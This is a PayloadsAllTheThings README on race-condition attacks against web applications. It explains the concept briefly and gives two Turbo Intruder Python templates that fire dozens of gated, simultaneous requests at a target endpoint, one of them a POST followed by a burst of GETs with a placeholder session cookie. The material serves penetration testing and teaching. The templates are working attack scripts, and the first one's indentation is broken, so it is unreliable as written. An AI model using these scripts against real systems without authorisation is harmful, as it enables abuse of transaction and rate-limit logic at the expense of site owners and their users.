PayloadsAllTheThings/Race Condition
idealphase 9f9fbe4fe5
Updated Race Condition README.md
Added Turbo Intruder 2 Requests Examples use when the window may only be a few milliseconds.
2022-04-19 11:06:34 +07:00
..
README.md Updated Race Condition README.md 2022-04-19 11:06:34 +07:00

Race Condition

Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.

Summary

Tools

Turbo Intruder Examples

  1. Send request to turbo intruder
  2. Use this python code as a payload of the turbo intruder
    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                            concurrentConnections=30,
                            requestsPerConnection=30,
                            pipeline=False
                            )
    
    for i in range(30):
        engine.queue(target.req, i)
            engine.queue(target.req, target.baseInput, gate='race1')
    
    
        engine.start(timeout=5)
    engine.openGate('race1')
    
        engine.complete(timeout=60)
    
    
    def handleResponse(req, interesting):
        table.add(req)
    
  3. Now set the external HTTP header x-request: %s - ⚠️ This is needed by the turbo intruder
  4. Click "Attack"

Turbo Intruder 2 Requests Examples

This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.

def queueRequests(target, wordlists): 
    engine = RequestEngine(endpoint=target.endpoint, 
                           concurrentConnections=30, 
                           requestsPerConnection=100, 
                           pipeline=False 
                           ) 
    request1 = '''
POST /target-URI-1 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>

parameterName=parameterValue
    ''' 

    request2 = '''
GET /target-URI-2 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
    '''

    engine.queue(request1, gate='race1')
    for i in range(30): 
        engine.queue(request2, gate='race1') 
    engine.openGate('race1') 
    engine.complete(timeout=60) 
def handleResponse(req, interesting): 
    table.add(req)

References